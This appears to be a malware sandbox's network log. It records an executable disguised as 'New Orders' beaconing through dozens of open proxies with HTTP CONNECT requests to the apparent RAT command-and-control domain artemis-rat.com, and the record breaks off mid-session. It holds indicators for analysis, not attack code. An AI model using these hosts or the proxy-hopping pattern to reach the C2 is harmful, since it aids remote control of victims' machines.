                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1966192.168.2.95518047.243.114.19281807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.712380886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.044909954 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:52 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1967192.168.2.95517342.49.148.16790017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.728960991 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:53.163167000 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1968192.168.2.95412551.79.87.14485337672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.852329016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1969192.168.2.955191129.213.150.205807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.852464914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1970192.168.2.9551868.130.39.11733897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.853034973 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1971192.168.2.95519245.61.188.134444997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.853529930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.444431067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.105395079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.445389032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.037844896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1972192.168.2.95411388.135.210.17980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.918679953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.975665092 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1973192.168.2.95519379.110.202.13180817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.965215921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1974192.168.2.9551968.217.95.4488997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.971831083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1975192.168.2.95511488.79.243.10331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.977307081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1976192.168.2.95519882.113.157.122312807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.992779970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.663990974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.570620060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.476521015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.165518045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.773489952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.476588964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:14.667572975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.773164988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1977192.168.2.954154138.2.73.15710807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.998985052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1978192.168.2.95519779.110.201.23580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.007443905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1979192.168.2.955137206.220.175.241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.013310909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1980192.168.2.954242133.232.90.155807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.103274107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.432008028 CET806INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:53 GMT
                                                                                        Server: Apache/2.4.18 (Ubuntu)
                                                                                        Content-Length: 614
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1981192.168.2.95259024.144.87.18780007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.149234056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.409991026 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1982192.168.2.95419637.27.6.46807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.168922901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.242089987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.120841980 CET344INHTTP/1.1 403 Forbidden
                                                                                        Date: Mon, 11 Mar 2024 15:17:00 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 199
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1983192.168.2.95424934.95.243.12280817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.262520075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.945219994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.263412952 CET59INHTTP/1.1 200 Connection Established
                                                                                        Proxy-agent: nginx


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1984192.168.2.955204119.91.214.11933897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.323164940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1985192.168.2.95514745.88.90.19931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.460503101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.195288897 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1986192.168.2.955166146.19.106.193123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.493438005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.070180893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773474932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.976484060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.164004087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1987192.168.2.955149188.166.28.8831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.493582964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.712457895 CET131INHTTP/1.1 503 Too many open connections
                                                                                        Content-Type: text/plain
                                                                                        Connection: close
                                                                                        Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                        Data Ascii: Maximum number of open connections reached.
                                                                                        Mar 11, 2024 16:16:58.204121113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1988192.168.2.95516052.151.210.20490007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.513667107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1989192.168.2.95433292.204.134.38544677672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.523988008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.742033005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1990192.168.2.95517772.49.49.11310347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.546077013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
